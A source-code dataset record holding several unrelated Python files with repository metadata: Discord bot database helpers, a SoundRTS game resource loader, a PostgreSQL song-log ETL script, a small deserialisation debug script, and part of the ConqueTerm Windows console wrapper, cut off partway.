async def maybe_coroutine(function: Callable, *args, **kwargs) -> Any:
"""
|coro|
Returns the return value of the function.
:param Callable function: The function to call.
:param args: The arguments.
:param kwargs: The key arguments:
:return: The value.
:rtype: Any
"""
value = function(*args, **kwargs)
if inspect.isawaitable(value):
return await value
return value
def get_generator_response(generator: Any, generator_type: Any, *args, **kwargs) -> Any:
"""
Returns the generator response with the arguments.
:param generator: The generator to get the response from.
:type generator: Any
:param generator_type: The generator type. (Should be same as the generator type.
:type generator_type: Any
:param args: The arguments of the generator.
:param kwargs: The key arguments of the generator
:return: The generator response.
:rtype: Any
"""
if inspect.isclass(generator) and issubclass(generator, generator_type):
if inspect.ismethod(generator.generate):
return generator.generate(*args, **kwargs)
return generator().generate(*args, **kwargs)
if isinstance(generator, generator_type):
return generator.generate(*args, **kwargs)
raise InvalidGenerator(generator)
def generate_column_types(
types: Iterable[str], database_type: Any
) -> Optional[List[str]]:
"""
Generates the column type names that are suitable for the database type.
:param types: The column types.
:type types: Iterable[str]
:param database_type: The database type.
:type database_type: Any
:return: The suitable column types for the database types.
:rtype: Optional[List[str]]
"""
database_type_configuration = COLUMN_TYPES.get(database_type)
if database_type_configuration is None:
return
return [database_type_configuration[x] for x in types]
async def questionnaire(
ctx: commands.Context,
questions: Iterable[Union[str, discord.Embed]],
public: bool = False,
timeout: Union[float, int] = 30,
member: discord.Member = None,
) -> Tuple[List[str], bool]:
"""
|coro|
Questions the member using a "quiz" and returns the answers.
The questionnaire can be used without a specific member and be public.
If no member was passed and the questionnaire public argument is true, a ValueError will be raised.
:raises: ValueError: The questionnaire is private and no member was provided.
:param ctx: The context (where the questionnaire will ask the questions).
:type ctx: commands.Context
:param questions: The questions the questionnaire will ask.
:type questions: Iterable[Union[str, discord.Embed]]
:param public: A bool indicating if the questionnaire is public.
:type public: bool
:param timeout: The number of seconds until the questionnaire will stop and time out.
:type timeout: Union[float, int]
:param member: The member the questionnaire will get the answers from.
:type member: discord.Member
:return: The answers and a boolean indicating if the questionnaire timed out.
:rtype: Tuple[List[str], bool]
"""
answers = []
timed_out = False
if not public and not member:
raise ValueError("The questionnaire is private and no member was provided.")
def checks(msg):
return (
msg.channel == ctx.channel
if public
else msg.channel == ctx.channel and msg.author == member
)
for question in questions:
if isinstance(question, str):
await ctx.send(question)
elif isinstance(question, discord.Embed):
await ctx.send(embed=question)
else:
raise TypeError("Question must be of type 'str' or 'discord.Embed'.")
try:
message = await ctx.bot.wait_for("message", check=checks, timeout=timeout)
except asyncio.TimeoutError:
timed_out = True
break
answers.append(message.content)
return answers, timed_out
@dataclass
class EventManager:
"""
An event manager that manages events for managers.
"""
events: dict = dataclasses.field(default_factory=dict, init=False)
async def call_event(self, name: str, *args, **kwargs) -> None:
"""
Calls the event name with the arguments
:param name: The event name.
:type name: str
:param args: The arguments.
:param kwargs: The key arguments.
:return: None
:rtype: None
"""
if name in self.events:
for event in self.events[name]:
await event(*args, **kwargs)
def event(self, name: str = None) -> Callable:
"""
A decorator which adds an event listener.
:param name: The event name.
:type name: str
:return: The inner function.
:rtype: Callable
"""
def inner(func):
self.add_event(func, name)
return func
return inner
def add_event(self, func: Callable, name: str = None) -> None:
"""
Adds an event to the event dictionary.
:param func: The event callback.
:type func: Callable
:param name: The event name.
:type name: str
:return: None
:rtype: None
:raises: TypeError: The listener isn't async.
"""
name = func.__name__ if not name else name
if not asyncio.iscoroutinefunction(func):
raise TypeError("Listeners must be async.")
if name in self.events:
self.events[name].append(func)
else:
self.events[name] = [func]
def remove_event(self, func: Callable, name: str = None) -> None:
"""
Removes an event from the event dictionary.
:param func: The event callback.
:type func: Callable
:param name: The event name.
:type name: str
:return: None
:rtype: None
"""
name = func.__name__ if not name else name
if name in self.events:
self.events[name].remove(func)
def handle_task_exceptions(task: asyncio.Task) -> None:
"""
Handles the task's exceptions.
:param asyncio.Task task: The task.
:return: None
:rtype: None
"""
try:
task.result()
except asyncio.CancelledError:
pass
except Exception as e:
raise e
def create_task(loop: asyncio.AbstractEventLoop, coroutine: Coroutine) -> None:
"""
Creates a task and handles exceptions.
:param asyncio.AbstractEventLoop loop: The loop to run the coroutine on.
:param Coroutine coroutine: The coroutine.
:return: None
:rtype: None
"""
try:
task = loop.create_task(coroutine)
task.add_done_callback(handle_task_exceptions)
except RuntimeError:
pass
class CogManager:
"""
A CogManager which helps the user use the managers inside discord cogs.
"""
class Cog:
"""
The internal Cog class.
"""
def __init__(self, managers: List = None):
listeners = {}
managers = [] if managers is None else managers
attribute_objects = [getattr(self, attr) for attr in dir(self)]
for attr in attribute_objects:
listener_type = getattr(attr, "_listener_type", None)
if listener_type:
if listener_type in listeners:
listeners[listener_type].append(attr)
else:
listeners[listener_type] = [attr]
managers = managers or [
attr for attr in attribute_objects if type(attr) in listeners
]
for event_type in listeners:
for manager in managers:
for event in listeners[event_type]:
manager.add_event(event)
@staticmethod
def event(manager_type: Any) -> Callable:
"""
Adds an event to the Cog event list.
:param manager_type: The manager type of the event.
:type manager_type: Any
:rtype: Callable
:return: The inner function.
:raises: TypeError: The listener isn't async.
"""
def decorator(func):
if not inspect.iscoroutinefunction(func):
raise TypeError("Listeners must be async.")
func._listener_type = manager_type
return func
return decorator
@dataclass
class DatabaseChecker(EventManager):
"""
A database checker which makes sure the database is connected to a manager and handles the table creation.
"""
tables_column_data: List[Dict[str, str]]
table_identifiers: List[str]
database: Optional[Database] = dataclasses.field(default=None, init=False)
tables: Dict[str, str] = dataclasses.field(default_factory=dict, init=False)
@staticmethod
def uses_database(func):
def inner(self, *args, **kwargs):
self._check_database()
return func(self, *args, **kwargs)
return inner
def _check_database(self, raise_error: bool = True) -> bool:
"""
A function which checks if the database is connected.
:param raise_error: A bool indicating if the function should raise an error if the database is not connected.
:type raise_error: bool
:rtype: bool
:return: If the database is connected.
:raises: DatabaseNotConnected: The database is not connected.
"""
if not self.database:
print("Not Connected")
return False
return True
async def connect_to_database(
self, database: Database, tables: List[str] = None
) -> None:
"""
Connects to the database.
Calls on_database_connect when connected.
:param database: The database to connect to.
:type database: Database
:param tables: The tables to create (incase they do not exist).
:type tables: List[str]
:rtype: None
:return: None
"""
if not tables or len(tables) != len(self.table_identifiers):
tables = self.table_identifiers
for table, table_data, identifier in zip(
tables, self.tables_column_data, self.table_identifiers
):
types = generate_column_types(table_data.values(), type(database.database))
await database.create_table(
table, dict(zip(list(table_data), types)) if types else None, True
)
self.database = database
self.tables[identifier] = table
await self.call_event("on_database_connect")
| 27.237903 | 117 | 0.623316 | from __future__ import annotations
import asyncio
import dataclasses
import inspect
import logging
from dataclasses import dataclass
from typing import (
List,
Any,
Iterable,
Optional,
TYPE_CHECKING,
Union,
Tuple,
Callable,
Dict,
Coroutine,
)
import aiomysql
try:
import aiopg
except ImportError:
aiopg = None
logging.warning(
"Aiopg is not installed correctly, postgres databases are not supported."
)
import aiosqlite
import discord
from motor import motor_asyncio
if TYPE_CHECKING:
from discord.ext import commands
from .database import Database
from datetime import timedelta
__all__ = (
"COLUMN_TYPES",
"DatabaseNotConnected",
"InvalidGenerator",
"get_generator_response",
"maybe_coroutine",
"generate_column_types",
"questionnaire",
"EventManager",
"create_task",
"CogManager",
"DatabaseChecker",
"CacheBased",
)
COLUMN_TYPES = {
motor_asyncio.AsyncIOMotorDatabase: None,
aiosqlite.core.Connection: {
"snowflake": "INTEGER",
"string": "TEXT",
"number": "INTEGER",
"smallnumber": "INTEGER",
},
aiomysql.pool.Pool: {
"snowflake": "BIGINT",
"string": "TEXT",
"number": "INT",
"smallnumber": "SMALLINT",
},
}
if aiopg:
COLUMN_TYPES[aiopg.pool.Pool] = {
"snowflake": "BIGINT",
"string": "TEXT",
"number": "INT",
"smallnumber": "SMALLINT",
}
class DatabaseNotConnected(Exception):
@dataclass
class CacheBased:
bot: commands.Bot
wipe_cache_delay: timedelta
_cache: dict = dataclasses.field(default_factory=dict, init=False, repr=False)
def __post_init__(self):
asyncio.get_event_loop().create_task(self.__wipe_cache())
async def __wipe_cache(self) -> None:
while not self.bot.is_closed():
await asyncio.sleep(self.wipe_cache_delay.total_seconds())
self._cache = {}
class InvalidGenerator(Exception):
__slots__ = ("generator",)
def __init__(self, generator):
self.generator = generator
super().__init__(
f"Generator of type {type(self.generator)!r} is not supported."
)
async def maybe_coroutine(function: Callable, *args, **kwargs) -> Any:
value = function(*args, **kwargs)
if inspect.isawaitable(value):
return await value
return value
def get_generator_response(generator: Any, generator_type: Any, *args, **kwargs) -> Any:
if inspect.isclass(generator) and issubclass(generator, generator_type):
if inspect.ismethod(generator.generate):
return generator.generate(*args, **kwargs)
return generator().generate(*args, **kwargs)
if isinstance(generator, generator_type):
return generator.generate(*args, **kwargs)
raise InvalidGenerator(generator)
def generate_column_types(
types: Iterable[str], database_type: Any
) -> Optional[List[str]]:
database_type_configuration = COLUMN_TYPES.get(database_type)
if database_type_configuration is None:
return
return [database_type_configuration[x] for x in types]
async def questionnaire(
ctx: commands.Context,
questions: Iterable[Union[str, discord.Embed]],
public: bool = False,
timeout: Union[float, int] = 30,
member: discord.Member = None,
) -> Tuple[List[str], bool]:
answers = []
timed_out = False
if not public and not member:
raise ValueError("The questionnaire is private and no member was provided.")
def checks(msg):
return (
msg.channel == ctx.channel
if public
else msg.channel == ctx.channel and msg.author == member
)
for question in questions:
if isinstance(question, str):
await ctx.send(question)
elif isinstance(question, discord.Embed):
await ctx.send(embed=question)
else:
raise TypeError("Question must be of type 'str' or 'discord.Embed'.")
try:
message = await ctx.bot.wait_for("message", check=checks, timeout=timeout)
except asyncio.TimeoutError:
timed_out = True
break
answers.append(message.content)
return answers, timed_out
@dataclass
class EventManager:
events: dict = dataclasses.field(default_factory=dict, init=False)
async def call_event(self, name: str, *args, **kwargs) -> None:
if name in self.events:
for event in self.events[name]:
await event(*args, **kwargs)
def event(self, name: str = None) -> Callable:
def inner(func):
self.add_event(func, name)
return func
return inner
def add_event(self, func: Callable, name: str = None) -> None:
name = func.__name__ if not name else name
if not asyncio.iscoroutinefunction(func):
raise TypeError("Listeners must be async.")
if name in self.events:
self.events[name].append(func)
else:
self.events[name] = [func]
def remove_event(self, func: Callable, name: str = None) -> None:
name = func.__name__ if not name else name
if name in self.events:
self.events[name].remove(func)
def handle_task_exceptions(task: asyncio.Task) -> None:
try:
task.result()
except asyncio.CancelledError:
pass
except Exception as e:
raise e
def create_task(loop: asyncio.AbstractEventLoop, coroutine: Coroutine) -> None:
try:
task = loop.create_task(coroutine)
task.add_done_callback(handle_task_exceptions)
except RuntimeError:
pass
class CogManager:
class Cog:
def __init__(self, managers: List = None):
listeners = {}
managers = [] if managers is None else managers
attribute_objects = [getattr(self, attr) for attr in dir(self)]
for attr in attribute_objects:
listener_type = getattr(attr, "_listener_type", None)
if listener_type:
if listener_type in listeners:
listeners[listener_type].append(attr)
else:
listeners[listener_type] = [attr]
managers = managers or [
attr for attr in attribute_objects if type(attr) in listeners
]
for event_type in listeners:
for manager in managers:
for event in listeners[event_type]:
manager.add_event(event)
@staticmethod
def event(manager_type: Any) -> Callable:
def decorator(func):
if not inspect.iscoroutinefunction(func):
raise TypeError("Listeners must be async.")
func._listener_type = manager_type
return func
return decorator
@dataclass
class DatabaseChecker(EventManager):
tables_column_data: List[Dict[str, str]]
table_identifiers: List[str]
database: Optional[Database] = dataclasses.field(default=None, init=False)
tables: Dict[str, str] = dataclasses.field(default_factory=dict, init=False)
@staticmethod
def uses_database(func):
def inner(self, *args, **kwargs):
self._check_database()
return func(self, *args, **kwargs)
return inner
def _check_database(self, raise_error: bool = True) -> bool:
if not self.database:
print("Not Connected")
return False
return True
async def connect_to_database(
self, database: Database, tables: List[str] = None
) -> None:
if not tables or len(tables) != len(self.table_identifiers):
tables = self.table_identifiers
for table, table_data, identifier in zip(
tables, self.tables_column_data, self.table_identifiers
):
types = generate_column_types(table_data.values(), type(database.database))
await database.create_table(
table, dict(zip(list(table_data), types)) if types else None, True
)
self.database = database
self.tables[identifier] = table
await self.call_event("on_database_connect")
| true | true |
1c333c80bcf6e629732d06ee24c7f63afee6c56e | 1,861 | py | Python | soundrts/res.py | Finnboy94/soundrts | 284ffe2c507f4c9e44b4e5fa8c4ef05b6614c6c6 | [
"BSD-3-Clause"
] | 23 | 2015-04-02T16:54:08.000Z | 2022-03-02T09:48:04.000Z | soundrts/res.py | Finnboy94/soundrts | 284ffe2c507f4c9e44b4e5fa8c4ef05b6614c6c6 | [
"BSD-3-Clause"
] | 94 | 2015-03-25T21:05:45.000Z | 2021-12-22T20:05:42.000Z | soundrts/res.py | TifloDev/soundrts | 209695ed80b8746facdcb35f446f0f855c48da84 | [
"BSD-3-Clause"
] | 33 | 2015-05-27T05:53:14.000Z | 2021-12-08T02:45:44.000Z | """SoundRTS resource manager"""
import os
from . import config, options
from .lib.resource import ResourceLoader
from .paths import MAPS_PATHS
def get_all_packages_paths():
"""return the default "maps and mods" paths followed by the paths of the active packages"""
return MAPS_PATHS # + package_manager.get_packages_paths()
if options.mods is not None:
mods = options.mods
else:
mods = config.mods
_r = ResourceLoader(mods, config.soundpacks, get_all_packages_paths())
mods = _r.mods
soundpacks = _r.soundpacks
get_text_file = _r.get_text_file
load_texts = _r.load_texts
get_sound_paths = _r.get_sound_paths
def reload_all():
global mods, soundpacks
from .clientmedia import sounds, update_display_caption
_r.update_mods_list(mods, soundpacks, get_all_packages_paths())
mods = _r.mods
soundpacks = _r.soundpacks
update_display_caption()
sounds.load_default(_r)
def set_mods(new_mods):
global mods
if new_mods != mods:
mods = new_mods
reload_all()
def set_soundpacks(new_soundpacks):
global soundpacks
if new_soundpacks != soundpacks:
soundpacks = new_soundpacks
reload_all()
# mods
def is_a_soundpack(path):
for name in ("rules.txt", "ai.txt"):
if os.path.isfile(os.path.join(path, name)):
return False
return True
def is_a_mod(path):
return not is_a_soundpack(path)
def available_mods(check_mod_type=is_a_mod):
result = []
for path in get_all_packages_paths():
mods_path = os.path.join(path, "mods")
for mod in os.listdir(mods_path):
path = os.path.join(mods_path, mod)
if os.path.isdir(path) and check_mod_type(path) and mod not in result:
result.append(mod)
return result
def available_soundpacks():
return available_mods(is_a_soundpack)
| 23.556962 | 95 | 0.699624 |
import os
from . import config, options
from .lib.resource import ResourceLoader
from .paths import MAPS_PATHS
def get_all_packages_paths():
return MAPS_PATHS
if options.mods is not None:
mods = options.mods
else:
mods = config.mods
_r = ResourceLoader(mods, config.soundpacks, get_all_packages_paths())
mods = _r.mods
soundpacks = _r.soundpacks
get_text_file = _r.get_text_file
load_texts = _r.load_texts
get_sound_paths = _r.get_sound_paths
def reload_all():
global mods, soundpacks
from .clientmedia import sounds, update_display_caption
_r.update_mods_list(mods, soundpacks, get_all_packages_paths())
mods = _r.mods
soundpacks = _r.soundpacks
update_display_caption()
sounds.load_default(_r)
def set_mods(new_mods):
global mods
if new_mods != mods:
mods = new_mods
reload_all()
def set_soundpacks(new_soundpacks):
global soundpacks
if new_soundpacks != soundpacks:
soundpacks = new_soundpacks
reload_all()
def is_a_soundpack(path):
for name in ("rules.txt", "ai.txt"):
if os.path.isfile(os.path.join(path, name)):
return False
return True
def is_a_mod(path):
return not is_a_soundpack(path)
def available_mods(check_mod_type=is_a_mod):
result = []
for path in get_all_packages_paths():
mods_path = os.path.join(path, "mods")
for mod in os.listdir(mods_path):
path = os.path.join(mods_path, mod)
if os.path.isdir(path) and check_mod_type(path) and mod not in result:
result.append(mod)
return result
def available_soundpacks():
return available_mods(is_a_soundpack)
| true | true |
1c333d0051d4c4cf7ff7cd86bb2a6b0e789d47e6 | 3,434 | py | Python | DataModelling_PostgreSQL/etl.py | RammySekham/Data-Engineering | eec1020defe9c54403f6a80ba91fc071ed22b727 | [
"MIT"
] | 1 | 2021-06-08T15:49:50.000Z | 2021-06-08T15:49:50.000Z | DataModelling_PostgreSQL/etl.py | RammySekham/Data-Engineering | eec1020defe9c54403f6a80ba91fc071ed22b727 | [
"MIT"
] | null | null | null | DataModelling_PostgreSQL/etl.py | RammySekham/Data-Engineering | eec1020defe9c54403f6a80ba91fc071ed22b727 | [
"MIT"
] | null | null | null | import os
import glob
import psycopg2
import pandas as pd
import settings
from sql_queries import *
def process_song_file(cur, filepath):
"""
process the json song file to insert song record into SQL table
"""
# open song file
df = pd.read_json(filepath, lines=True)
# insert song record
song_data = df[['song_id', 'title', 'artist_id', 'year', 'duration']].values[0]
cur.execute(song_table_insert, song_data)
# insert artist record
artist_data = df.loc[0, ['artist_id', 'artist_name', 'artist_location', 'artist_latitude','artist_longitude']].values.tolist()
cur.execute(artist_table_insert, artist_data)
def process_log_file(cur, filepath):
"""
process the json log file to dump data into SQL table
"""
# open log file
df = pd.read_json(filepath, lines=True)
# filter by NextSong action
df = df[df.loc[:, 'page']=="NextSong"]
# convert timestamp column to datetime
t = pd.to_datetime((df.ts)/1000)
# insert time data records
time_data = {'t':t, 'hour':t.dt.hour, 'day':t.dt.day, 'week':t.dt.isocalendar().week, 'month':t.dt.month, 'year':t.dt.year, 'weekday':t.dt.weekday}
column_labels = ['t', 'hour', 'day', 'week', 'month', 'year', 'weekday']
time_df = pd.DataFrame(data=time_data, columns=column_labels)
for i, row in time_df.iterrows():
cur.execute(time_table_insert, list(row))
# load user table
user_df = (df.loc[:, ['userId', 'firstName', 'lastName', 'gender', 'level']])
# insert user records
for i, row in user_df.iterrows():
cur.execute(user_table_insert, row)
# insert songplay records
for index, row in df.iterrows():
# get songid and artistid from song and artist tables
cur.execute(song_select, (row.song, row.artist, row.length))
results = cur.fetchone()
if results:
songid, artistid = results
else:
songid, artistid = None, None
# insert songplay record
songplay_data = (pd.Timestamp(row.ts/1000, unit='s'), row.userId, row.level, songid, artistid, row.sessionId, row.location, row.userAgent)
cur.execute(songplay_table_insert, songplay_data)
def process_data(cur, conn, filepath, func):
"""
process the file based on given func
"""
# get all files matching extension from directory
all_files = []
for root, dirs, files in os.walk(filepath):
files = glob.glob(os.path.join(root,'*.json'))
for f in files :
all_files.append(os.path.abspath(f))
# get total number of files found
num_files = len(all_files)
print('{} files found in {}'.format(num_files, filepath))
# iterate over files and process
for i, datafile in enumerate(all_files, 1):
func(cur, datafile)
conn.commit()
print('{}/{} files processed.'.format(i, num_files))
def main():
"""
Calling process_data function to process the raw files to insert data into SQL tables
"""
conn = psycopg2.connect(host=settings.host, dbname=settings.new_db, user=settings.user, password=settings.password, port=settings.port)
cur = conn.cursor()
process_data(cur, conn, filepath='data/song_data', func=process_song_file)
process_data(cur, conn, filepath='data/log_data', func=process_log_file)
conn.close()
if __name__ == "__main__":
main() | 31.218182 | 151 | 0.647059 | import os
import glob
import psycopg2
import pandas as pd
import settings
from sql_queries import *
def process_song_file(cur, filepath):
df = pd.read_json(filepath, lines=True)
song_data = df[['song_id', 'title', 'artist_id', 'year', 'duration']].values[0]
cur.execute(song_table_insert, song_data)
artist_data = df.loc[0, ['artist_id', 'artist_name', 'artist_location', 'artist_latitude','artist_longitude']].values.tolist()
cur.execute(artist_table_insert, artist_data)
def process_log_file(cur, filepath):
df = pd.read_json(filepath, lines=True)
df = df[df.loc[:, 'page']=="NextSong"]
t = pd.to_datetime((df.ts)/1000)
time_data = {'t':t, 'hour':t.dt.hour, 'day':t.dt.day, 'week':t.dt.isocalendar().week, 'month':t.dt.month, 'year':t.dt.year, 'weekday':t.dt.weekday}
column_labels = ['t', 'hour', 'day', 'week', 'month', 'year', 'weekday']
time_df = pd.DataFrame(data=time_data, columns=column_labels)
for i, row in time_df.iterrows():
cur.execute(time_table_insert, list(row))
user_df = (df.loc[:, ['userId', 'firstName', 'lastName', 'gender', 'level']])
for i, row in user_df.iterrows():
cur.execute(user_table_insert, row)
for index, row in df.iterrows():
cur.execute(song_select, (row.song, row.artist, row.length))
results = cur.fetchone()
if results:
songid, artistid = results
else:
songid, artistid = None, None
songplay_data = (pd.Timestamp(row.ts/1000, unit='s'), row.userId, row.level, songid, artistid, row.sessionId, row.location, row.userAgent)
cur.execute(songplay_table_insert, songplay_data)
def process_data(cur, conn, filepath, func):
all_files = []
for root, dirs, files in os.walk(filepath):
files = glob.glob(os.path.join(root,'*.json'))
for f in files :
all_files.append(os.path.abspath(f))
num_files = len(all_files)
print('{} files found in {}'.format(num_files, filepath))
for i, datafile in enumerate(all_files, 1):
func(cur, datafile)
conn.commit()
print('{}/{} files processed.'.format(i, num_files))
def main():
conn = psycopg2.connect(host=settings.host, dbname=settings.new_db, user=settings.user, password=settings.password, port=settings.port)
cur = conn.cursor()
process_data(cur, conn, filepath='data/song_data', func=process_song_file)
process_data(cur, conn, filepath='data/log_data', func=process_log_file)
conn.close()
if __name__ == "__main__":
main() | true | true |
1c333e6fb73118b48b9d8dd4e0ef09d56c4dbb63 | 470 | py | Python | bin/rehex.py | HashRentalCoin/sentinel | f8ddd4682a485c10f151968e130123597994b2fb | [
"MIT"
] | null | null | null | bin/rehex.py | HashRentalCoin/sentinel | f8ddd4682a485c10f151968e130123597994b2fb | [
"MIT"
] | null | null | null | bin/rehex.py | HashRentalCoin/sentinel | f8ddd4682a485c10f151968e130123597994b2fb | [
"MIT"
] | null | null | null | import simplejson
import binascii
import sys
import pdb
from pprint import pprint
import sys
import os
sys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), '../lib')))
import hashrentalcoinlib
# ============================================================================
usage = "%s <hex>" % sys.argv[0]
obj = None
if len(sys.argv) < 2:
print(usage)
sys.exit(1)
else:
obj = hashrentalcoinlib.deserialise(sys.argv[1])
pdb.set_trace()
1
| 21.363636 | 84 | 0.6 | import simplejson
import binascii
import sys
import pdb
from pprint import pprint
import sys
import os
sys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), '../lib')))
import hashrentalcoinlib
usage = "%s <hex>" % sys.argv[0]
obj = None
if len(sys.argv) < 2:
print(usage)
sys.exit(1)
else:
obj = hashrentalcoinlib.deserialise(sys.argv[1])
pdb.set_trace()
1
| true | true |
1c333f90187e1951964e824ce8ea4d592a06fada | 8,791 | py | Python | vim/autoload/conque_term/conque_sole_wrapper.py | adifinem/dotvim | 73d1acc3cfa457ad3790a5b4612dc7479d6a7019 | [
"0BSD"
] | 413 | 2015-01-27T04:34:18.000Z | 2019-05-15T07:37:18.000Z | home/.vim/autoload/conque_term/conque_sole_wrapper.py | khilnani/dot_files | 6f8d40e5137e9c207023aff5e540c1ff3c00cff3 | [
"MIT"
] | 11 | 2015-03-03T08:34:44.000Z | 2018-09-22T22:18:55.000Z | home/.vim/autoload/conque_term/conque_sole_wrapper.py | khilnani/dot_files | 6f8d40e5137e9c207023aff5e540c1ff3c00cff3 | [
"MIT"
] | 107 | 2015-05-29T02:27:34.000Z | 2019-05-03T22:58:47.000Z | # FILE: autoload/conque_term/conque_sole_wrapper.py
# AUTHOR: Nico Raffo <nicoraffo@gmail.com>
# WEBSITE: http://conque.googlecode.com
# MODIFIED: 2011-09-02
# VERSION: 2.3, for Vim 7.0
# LICENSE:
# Conque - Vim terminal/console emulator
# Copyright (C) 2009-2011 Nico Raffo
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
ConqueSoleSubprocessWrapper
Subprocess wrapper to deal with Windows insanity. Launches console based python,
which in turn launches originally requested command. Communicates with cosole
python through shared memory objects.
"""
import ctypes
import time
class ConqueSoleWrapper():
# unique key used for shared memory block names
shm_key = ''
# process info
handle = None
pid = None
# queue input in this bucket
bucket = None
# console size
lines = 24
columns = 80
# shared memory objects
shm_input = None
shm_output = None
shm_attributes = None
shm_stats = None
shm_command = None
shm_rescroll = None
shm_resize = None
# console python process
proc = None
def open(self, cmd, lines, columns, python_exe='python.exe', communicator_py='conque_sole_communicator.py', options={}):
""" Launch python.exe subprocess which will in turn launch the user's program.
Arguments:
cmd -- The user's command to run. E.g. "Powershell.exe" or "C:\Python27\Scripts\ipython.bat"
lines, columns -- The size of the console, also the size of the Vim buffer
python.exe -- The path to the python executable, typically C:\PythonXX\python.exe
communicator_py -- The path to the subprocess controller script in the user's vimfiles directory
options -- optional configuration
"""
self.lines = lines
self.columns = columns
self.bucket = u('')
# create a shm key
self.shm_key = 'mk' + str(time.time())
# python command
cmd_line = '%s "%s" %s %d %d %d %d %s' % (python_exe, communicator_py, self.shm_key, int(self.columns), int(self.lines), int(options['CODE_PAGE']), int(CONQUE_FAST_MODE), cmd)
# console window attributes
flags = NORMAL_PRIORITY_CLASS | DETACHED_PROCESS | CREATE_UNICODE_ENVIRONMENT
si = STARTUPINFO()
pi = PROCESS_INFORMATION()
# start the stupid process already
try:
res = ctypes.windll.kernel32.CreateProcessW(None, u(cmd_line), None, None, 0, flags, None, u('.'), ctypes.byref(si), ctypes.byref(pi))
except:
raise
# handle
self.pid = pi.dwProcessId
# init shared memory objects
self.init_shared_memory(self.shm_key)
def read(self, start_line, num_lines, timeout=0):
""" Read a range of console lines from shared memory.
Returns a pair of lists containing the console text and console text attributes.
"""
# emulate timeout by sleeping timeout time
if timeout > 0:
read_timeout = float(timeout) / 1000
time.sleep(read_timeout)
output = []
attributes = []
# get output
for i in range(start_line, start_line + num_lines + 1):
output.append(self.shm_output.read(self.columns, i * self.columns))
if not CONQUE_FAST_MODE:
attributes.append(self.shm_attributes.read(self.columns, i * self.columns))
return (output, attributes)
def get_stats(self):
""" Return a dictionary with current console cursor and scrolling information. """
try:
rescroll = self.shm_rescroll.read()
if rescroll != '' and rescroll != None:
self.shm_rescroll.clear()
# close down old memory
self.shm_output.close()
self.shm_output = None
if not CONQUE_FAST_MODE:
self.shm_attributes.close()
self.shm_attributes = None
# reallocate memory
self.shm_output = ConqueSoleSharedMemory(CONQUE_SOLE_BUFFER_LENGTH * self.columns * rescroll['data']['blocks'], 'output', rescroll['data']['mem_key'], True)
self.shm_output.create('read')
if not CONQUE_FAST_MODE:
self.shm_attributes = ConqueSoleSharedMemory(CONQUE_SOLE_BUFFER_LENGTH * self.columns * rescroll['data']['blocks'], 'attributes', rescroll['data']['mem_key'], True, encoding='latin-1')
self.shm_attributes.create('read')
stats_str = self.shm_stats.read()
if stats_str != '':
self.stats = stats_str
else:
return False
except:
return False
return self.stats
def is_alive(self):
""" Get process status. """
if not self.shm_stats:
return True
stats_str = self.shm_stats.read()
if stats_str:
return (stats_str['is_alive'])
else:
return True
def write(self, text):
""" Write input to shared memory. """
self.bucket += text
istr = self.shm_input.read()
if istr == '':
self.shm_input.write(self.bucket[:500])
self.bucket = self.bucket[500:]
def write_vk(self, vk_code):
""" Write virtual key code to shared memory using proprietary escape sequences. """
seq = u("\x1b[") + u(str(vk_code)) + u("VK")
self.write(seq)
def idle(self):
""" Write idle command to shared memory block, so subprocess controller can hibernate. """
self.shm_command.write({'cmd': 'idle', 'data': {}})
def resume(self):
""" Write resume command to shared memory block, so subprocess controller can wake up. """
self.shm_command.write({'cmd': 'resume', 'data': {}})
def close(self):
""" Shut it all down. """
self.shm_command.write({'cmd': 'close', 'data': {}})
time.sleep(0.2)
def window_resize(self, lines, columns):
""" Resize console window. """
self.lines = lines
# we don't shrink buffer width
if columns > self.columns:
self.columns = columns
self.shm_resize.write({'cmd': 'resize', 'data': {'width': columns, 'height': lines}})
def init_shared_memory(self, mem_key):
""" Create shared memory objects. """
self.shm_input = ConqueSoleSharedMemory(CONQUE_SOLE_INPUT_SIZE, 'input', mem_key)
self.shm_input.create('write')
self.shm_input.clear()
self.shm_output = ConqueSoleSharedMemory(CONQUE_SOLE_BUFFER_LENGTH * self.columns, 'output', mem_key, True)
self.shm_output.create('write')
if not CONQUE_FAST_MODE:
self.shm_attributes = ConqueSoleSharedMemory(CONQUE_SOLE_BUFFER_LENGTH * self.columns, 'attributes', mem_key, True, encoding='latin-1')
self.shm_attributes.create('write')
self.shm_stats = ConqueSoleSharedMemory(CONQUE_SOLE_STATS_SIZE, 'stats', mem_key, serialize=True)
self.shm_stats.create('write')
self.shm_stats.clear()
self.shm_command = ConqueSoleSharedMemory(CONQUE_SOLE_COMMANDS_SIZE, 'command', mem_key, serialize=True)
self.shm_command.create('write')
self.shm_command.clear()
self.shm_resize = ConqueSoleSharedMemory(CONQUE_SOLE_RESIZE_SIZE, 'resize', mem_key, serialize=True)
self.shm_resize.create('write')
self.shm_resize.clear()
self.shm_rescroll = ConqueSoleSharedMemory(CONQUE_SOLE_RESCROLL_SIZE, 'rescroll', mem_key, serialize=True)
self.shm_rescroll.create('write')
self.shm_rescroll.clear()
return True
# vim:foldmethod=marker
| 31.508961 | 204 | 0.639859 |
import ctypes
import time
class ConqueSoleWrapper():
shm_key = ''
handle = None
pid = None
bucket = None
lines = 24
columns = 80
shm_input = None
shm_output = None
shm_attributes = None
shm_stats = None
shm_command = None
shm_rescroll = None
shm_resize = None
proc = None
def open(self, cmd, lines, columns, python_exe='python.exe', communicator_py='conque_sole_communicator.py', options={}):
self.lines = lines
self.columns = columns
self.bucket = u('')
